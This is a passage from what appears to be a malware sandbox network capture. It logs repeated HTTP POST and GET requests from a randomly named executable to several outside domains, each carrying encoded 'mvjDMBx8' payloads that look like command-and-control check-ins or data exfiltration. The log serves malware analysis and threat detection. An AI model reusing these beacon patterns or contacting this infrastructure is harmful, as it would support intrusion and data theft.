                                        Aug 27, 2024 08:42:37.708352089 CEST | 873 | OUT | POST /dk4s/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.cs0724sd92jj.cloud
                                        Origin: http://www.cs0724sd92jj.cloud
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 237
                                        Referer: http://www.cs0724sd92jj.cloud/dk4s/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Aug 27, 2024 08:42:38.569730997 CEST | 406 | IN | HTTP/1.1 301 Moved Permanently
                                        Server: nginx
                                        Date: Tue, 27 Aug 2024 06:42:38 GMT
                                        Content-Type: text/html
                                        Content-Length: 162
                                        Connection: close
                                        Location: https://www.cs0724sd92jj.cloud/dk4s/
                                        Strict-Transport-Security: max-age=31536000
                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        11 | 192.168.2.6 | 51207 | 119.28.49.194 | 80 | 5700 | C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Aug 27, 2024 08:42:40.252702951 CEST | 1886 | OUT | POST /dk4s/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.cs0724sd92jj.cloud
                                        Origin: http://www.cs0724sd92jj.cloud
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 1249
                                        Referer: http://www.cs0724sd92jj.cloud/dk4s/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Aug 27, 2024 08:42:41.157800913 CEST | 406 | IN | HTTP/1.1 301 Moved Permanently
                                        Server: nginx
                                        Date: Tue, 27 Aug 2024 06:42:40 GMT
                                        Content-Type: text/html
                                        Content-Length: 162
                                        Connection: close
                                        Location: https://www.cs0724sd92jj.cloud/dk4s/
                                        Strict-Transport-Security: max-age=31536000
                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        12 | 192.168.2.6 | 51208 | 119.28.49.194 | 80 | 5700 | C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Aug 27, 2024 08:42:42.794981003 CEST | 589 | OUT | GET /dk4s/?mvjDMBx8=3h/m6gEkIEYHXtcNJZ5C3CADcygHFzVsLbB7LXK+s4FKSFcfshdIf9ZYkD73wqhGP2I3Lsc8IXkGColEMvp7YUHZOAuQGwzpl+pcDPhm8cR3ChF/e3R/pt7cs4gBzisZlZ7cEhY=&AT=RrjDj4Z85jYPlHG0 HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.cs0724sd92jj.cloud
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Aug 27, 2024 08:42:43.687777996 CEST | 572 | IN | HTTP/1.1 301 Moved Permanently
                                        Server: nginx
                                        Date: Tue, 27 Aug 2024 06:42:43 GMT
                                        Content-Type: text/html
                                        Content-Length: 162
                                        Connection: close
                                        Location: https://www.cs0724sd92jj.cloud/dk4s/?mvjDMBx8=3h/m6gEkIEYHXtcNJZ5C3CADcygHFzVsLbB7LXK+s4FKSFcfshdIf9ZYkD73wqhGP2I3Lsc8IXkGColEMvp7YUHZOAuQGwzpl+pcDPhm8cR3ChF/e3R/pt7cs4gBzisZlZ7cEhY=&AT=RrjDj4Z85jYPlHG0
                                        Strict-Transport-Security: max-age=31536000
                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        13 | 192.168.2.6 | 51209 | 85.159.66.93 | 80 | 5700 | C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Aug 27, 2024 08:42:48.836947918 CEST | 843 | OUT | POST /pziu/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.kontorpaneli.xyz
                                        Origin: http://www.kontorpaneli.xyz
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 213
                                        Referer: http://www.kontorpaneli.xyz/pziu/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Ascii: mvjDMBx8=JaWKjqbTsUzVMI2fc5c5Oi913EFoviJWXGClUJ/GNPmJU5R/ztHlIfocnhBVGF/Y6+gSc2kumRexBQwrp8j2ouZ8n7/lTwALsEsPl7k/2Szt9lHUHG2JnS6o0paQt7KoRI4v5L15YG6rhG6bVrX7x+ds6Qdq0cw1UwPjdjRKBbGOMiGl8kfD1GRN3NYYcrz8etSCMztEdD4g
                                        Aug 27, 2024 08:42:49.519751072 CEST | 225 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx/1.14.1
                                        Date: Tue, 27 Aug 2024 06:42:49 GMT
                                        Content-Length: 0
                                        Connection: close
                                        X-Rate-Limit-Limit: 5s
                                        X-Rate-Limit-Remaining: 19
                                        X-Rate-Limit-Reset: 2024-08-27T06:42:54.4080621Z


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        14 | 192.168.2.6 | 51210 | 85.159.66.93 | 80 | 5700 | C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Aug 27, 2024 08:42:51.377645969 CEST | 867 | OUT | POST /pziu/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.kontorpaneli.xyz
                                        Origin: http://www.kontorpaneli.xyz
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 237
                                        Referer: http://www.kontorpaneli.xyz/pziu/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Ascii: mvjDMBx8=JaWKjqbTsUzVPoGfaaE5IC907kFogCJSXG+lUNnWM8SJUct/ysHlPfocgRBMLl/p6+lvczEumRKxBRArpv71p+Z++r/nXwALsEsPl7xY2Srt8V3UEiqKhi6rzpaQgbLvRI4N5OVTYEyrhHKbEerk7+dm3wcY9ttNMw6gcA5qZJDpE0H/gXfgnWxP3PAqcLzWctqCekhjS3dDdqPcZiFm/N70kqLLFqF0ZQ==
                                        Aug 27, 2024 08:42:52.052587986 CEST | 225 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx/1.14.1
                                        Date: Tue, 27 Aug 2024 06:42:51 GMT
                                        Content-Length: 0
                                        Connection: close
                                        X-Rate-Limit-Limit: 5s
                                        X-Rate-Limit-Remaining: 18
                                        X-Rate-Limit-Reset: 2024-08-27T06:42:54.4080621Z


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        15 | 192.168.2.6 | 51211 | 85.159.66.93 | 80 | 5700 | C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Aug 27, 2024 08:42:53.931512117 CEST | 1880 | OUT | POST /pziu/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.kontorpaneli.xyz
                                        Origin: http://www.kontorpaneli.xyz
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 1249
                                        Referer: http://www.kontorpaneli.xyz/pziu/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Aug 27, 2024 08:42:54.625991106 CEST | 225 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx/1.14.1
                                        Date: Tue, 27 Aug 2024 06:42:54 GMT
                                        Content-Length: 0
                                        Connection: close
                                        X-Rate-Limit-Limit: 5s
                                        X-Rate-Limit-Remaining: 19
                                        X-Rate-Limit-Reset: 2024-08-27T06:42:59.5198668Z


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        16 | 192.168.2.6 | 51212 | 85.159.66.93 | 80 | 5700 | C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Aug 27, 2024 08:42:56.469331980 CEST | 587 | OUT | GET /pziu/?AT=RrjDj4Z85jYPlHG0&mvjDMBx8=EY+qgcjcqEvJaY+ALfwoPip36wdjh3xsdSy6XMjMfPv/Ir5Xz5+nGIw7jjJwblfp8IgSbQk1nTysBGMjrt/hxs8d+JiTcx1VzVYwtbha6lbR616oEW2vuE+H/qKkyJ7RSqcP4eo= HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.kontorpaneli.xyz
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Aug 27, 2024 08:42:57.182338953 CEST | 225 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx/1.14.1
                                        Date: Tue, 27 Aug 2024 06:42:57 GMT
                                        Content-Length: 0
                                        Connection: close
                                        X-Rate-Limit-Limit: 5s
                                        X-Rate-Limit-Remaining: 19
                                        X-Rate-Limit-Reset: 2024-08-27T06:43:02.0663113Z


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        17 | 192.168.2.6 | 51213 | 3.33.130.190 | 80 | 5700 | C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Aug 27, 2024 08:43:02.228945017 CEST | 837 | OUT | POST /76oh/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.globyglen.info
                                        Origin: http://www.globyglen.info
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 213
                                        Referer: http://www.globyglen.info/76oh/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Ascii: mvjDMBx8=WmKEMySB1uZy92UdAtesZ+3RQj/qSjtFJowsaeNAaxaU45JKmOI0/hSdVzFZgBy6/jJHcPPMv71Y8lSryE7klmNvxQMJPJW96WsvkJI9ghFFI2icQIGl5Vle3sTPsXmtq7OJFwlIgLbBMoRJWV24SGr1et/NrPKpCuv6BEhR215dVR0EMg2X1CwXwffhrPfEC6/l66Ya94OM


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        18 | 192.168.2.6 | 51214 | 3.33.130.190 | 80 | 5700 | C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Aug 27, 2024 08:43:04.776777029 CEST | 861 | OUT | POST /76oh/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.globyglen.info
                                        Origin: http://www.globyglen.info
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 237
                                        Referer: http://www.globyglen.info/76oh/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Ascii: mvjDMBx8=WmKEMySB1uZy9XkdTcesR+3ScD/qcDtJJo8safJQaEqU4Y5KnMs04hSdNjFY+xz4/jVPcK3Mv7hY8nary3jj0mNppgMLCpW96WsvkJsHgi1FIlKcXZGi6VldgcTPoXmpq7P5F1FugJjBMqJJWAa3c2r3at+qutffMcmKAG9IqiA2Qn1eQT20nSQVwdHTrvfuA6HlotU9yMrvdwzeNiOBbF/OgRqdH+fgMA==


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        19 | 192.168.2.6 | 51215 | 3.33.130.190 | 80 | 5700 | C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Aug 27, 2024 08:43:07.316279888 CEST | 1874 | OUT | POST /76oh/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.globyglen.info
                                        Origin: http://www.globyglen.info
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 1249
                                        Referer: http://www.globyglen.info/76oh/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        20 | 192.168.2.6 | 51217 | 3.33.130.190 | 80 | 5700 | C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Aug 27, 2024 08:43:09.860126019 CEST | 585 | OUT | GET /76oh/?mvjDMBx8=bkikPFO0y+dZ8FJVAZCFc8SLSjnSdRJGJM46ftFXLQOb8YZCjaJwx2qDHjBW5y2pzyppecjshIN6jiWBoFnF0mIbwCR4LMrqk0QV5plBln1dX3G3XbOh6jVBwPa42yOCsK/pJQQ=&AT=RrjDj4Z85jYPlHG0 HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.globyglen.info
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Aug 27, 2024 08:43:11.243931055 CEST | 420 | IN | HTTP/1.1 200 OK
                                        Server: openresty
                                        Date: Tue, 27 Aug 2024 06:43:11 GMT
                                        Content-Type: text/html
                                        Content-Length: 280
                                        Connection: close
                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?mvjDMBx8=bkikPFO0y+dZ8FJVAZCFc8SLSjnSdRJGJM46ftFXLQOb8YZCjaJwx2qDHjBW5y2pzyppecjshIN6jiWBoFnF0mIbwCR4LMrqk0QV5plBln1dX3G3XbOh6jVBwPa42yOCsK/pJQQ=&AT=RrjDj4Z85jYPlHG0"}</script></head></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        21 | 192.168.2.6 | 51218 | 194.195.220.41 | 80 | 5700 | C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Aug 27, 2024 08:43:16.415420055 CEST | 840 | OUT | POST /0hup/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.techcables.shop
                                        Origin: http://www.techcables.shop
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 213
                                        Referer: http://www.techcables.shop/0hup/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Ascii: mvjDMBx8=QGJw2gAG2bn03p/oiNymWTFveumtIP2iV6NfsH5ZZcAymz9tWdMU9RGi1VPkKlnmcR8c0IDThdoVP/0eain7pl4HVeT3iQBWmYY1RMw1+cbg5JRbmU5zf9Yx9h8+hsYjq0mfH2X19hxfQGMTNYQfXAy1KdXRyrkepNGEOkidbaNXtGv2Y/qk8AExOqRs9O9nP/XhPEIZ3hLa
                                        Aug 27, 2024 08:43:16.912897110 CEST | 866 | IN | HTTP/1.1 200 OK
                                        Server: openresty/1.13.6.1
                                        Date: Tue, 27 Aug 2024 06:43:16 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Content-Encoding: gzip


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        22 | 192.168.2.6 | 51219 | 194.195.220.41 | 80 | 5700 | C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Aug 27, 2024 08:43:18.955545902 CEST | 864 | OUT | POST /0hup/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.techcables.shop
                                        Origin: http://www.techcables.shop
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 237
                                        Referer: http://www.techcables.shop/0hup/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Ascii: mvjDMBx8=QGJw2gAG2bn0m4PokdOmUzFsROmtTf2mV6BfsFUcZKQymRVtXZ4U6RGiglPhJVmocRxh0J/ThZIVP/EeaRPkp14FAuT1swBWmYY1RMkP+cDglphbmxN0RdY+rx8+lsYdq0nyHz299jJfQH8TJcEAOQy7OdWcxp1AvffzH3f6aYw2lQusEMqHuQkzOoJe9u9NN/vhdTE+4Vu5ziVBXDmyC0gOwUpY+XUkUw==
                                        Aug 27, 2024 08:43:19.474562883 CEST | 865 | IN | HTTP/1.1 200 OK
                                        Server: openresty/1.13.6.1
                                        Date: Tue, 27 Aug 2024 06:43:19 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Content-Encoding: gzip


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        23 | 192.168.2.6 | 51220 | 194.195.220.41 | 80 | 5700 | C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Aug 27, 2024 08:43:21.507898092 CEST | 1877 | OUT | POST /0hup/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.techcables.shop
                                        Origin: http://www.techcables.shop
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 1249
                                        Referer: http://www.techcables.shop/0hup/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Ascii: mvjDMBx8=[TRUNCATED]
                                        Aug 27, 2024 08:43:22.022088051 CEST | 865 | IN | HTTP/1.1 200 OK
                                        Server: openresty/1.13.6.1
                                        Date: Tue, 27 Aug 2024 06:43:21 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Content-Encoding: gzip


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        24 | 192.168.2.6 | 51221 | 194.195.220.41 | 80 | 5700 | C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Aug 27, 2024 08:43:24.052992105 CEST | 586 | OUT | GET /0hup/?AT=RrjDj4Z85jYPlHG0&mvjDMBx8=dEhQ1XEV2cGux7LKlL+scgcBfO64DeKcVe19yXl7eYIZvhBzatxTyUaQx2TCVW77GzJhrYbmnII2KrJyLin2/kNdYev+ljAzma1yOM1J7qbV9Zx9z1N3S/Qs4ysm8OEw2XKCNmo= HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.techcables.shop
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Aug 27, 2024 08:43:24.580380917 CEST | 1236 | IN | HTTP/1.1 200 OK
                                        Server: openresty/1.13.6.1
                                        Date: Tue, 27 Aug 2024 06:43:24 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Data Ascii: 530<!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title></title> <noscript> <meta http-equiv="refresh" content="0;url=http://www70.techcables.shop/" /> </noscript> <meta http-equiv="refresh" content="5;url=http://www70.techcables.shop/" /> </head> <body onload="do_onload()"> <script type="text/javascript"> function do_onload() { window.top.location.href = "http://www.techcables.shop/0hup?gp=1&js=1&uuid=1724741004.9758137820&other_args=eyJ1cmkiOiAiLzBodXAiLCAiYXJncyI6ICJBVD1ScmpEajRaODVqWVBsSEcwJm12akRNQng4PWRFaFExWEVWMmNHdXg3TEtsTCtzY2djQmZPNjREZUtjVmUxOXlYbDdlWUladmhCemF0eFR5VWFReDJUQ1ZXNzdHekpocllibW5JSTJLckp5TGluMi9rTmRZZXYrbGpBem1hMXlPTTFKN3FiVjlaeDl6MU4zUy9RczR5c204T0V3MlhLQ05tbz0iLCAicmVmZXJlciI6ICIiLCAiYWNjZXB0IjogInRleHQvaHRtbCxhcHBsa [TRUNCATED]
                                        Aug 27, 2024 08:43:24.580403090 CEST | 260 | IN
                                        Data Ascii: W1hZ2Uvd2VicCxpbWFnZS9hcG5nLCovKjtxPTAuOCxhcHBsaWNhdGlvbi9zaWduZWQtZXhjaGFuZ2U7dj1iMztxPTAuNyIsICJ1cmlfYyI6ICJmNDEwIiwgImFyZ3NfYyI6ICI0OTNkIiwgInJlZmVyZXJfYyI6ICI0Njg5IiwgImFjY2VwdF9jIjogIjZiNzkifQ=="; } </script> </bod


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        25 | 192.168.2.6 | 51222 | 172.96.186.147 | 80 | 5700 | C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Aug 27, 2024 08:43:29.895638943 CEST | 855 | OUT | POST /vufj/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.adindadisini15.click
                                        Origin: http://www.adindadisini15.click
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 213
                                        Referer: http://www.adindadisini15.click/vufj/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Ascii: mvjDMBx8=zFrZDEsMDjlc7AauaQfhyqJuh4Eni6iaYNVHA1uZsudRlqDnylwmo/zHk5IogeJMy/vcKV+bsn6TqfG6Sv4coMlvpEBSqiIdihQY5CSEWPMOhSjxNiRM9zXUDnqYhTbICBrmm9jkiS9+xxkvU/kkaigRwpOxyCK5vGmVlpHaoHBQjYHH4WxalGVMaEXfPZmBXn9Ogv8VXC8C
                                        Aug 27, 2024 08:43:30.551156998 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                        Connection: close
                                        x-powered-by: PHP/7.4.33
                                        x-litespeed-tag: a7b_HTTP.404
                                        expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        content-type: text/html; charset=UTF-8
                                        link: <https://adindadisini15.click/wp-json/>; rel="https://api.w.org/"
                                        x-litespeed-cache-control: no-cache
                                        cache-control: no-cache, no-store, must-revalidate, max-age=0
                                        transfer-encoding: chunked
                                        content-encoding: gzip
                                        vary: Accept-Encoding
                                        date: Tue, 27 Aug 2024 06:43:30 GMT
                                        server: LiteSpeed


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        26 | 192.168.2.6 | 51223 | 172.96.186.147 | 80 | 5700 | C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Aug 27, 2024 08:43:32.443896055 CEST | 879 | OUT | POST /vufj/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
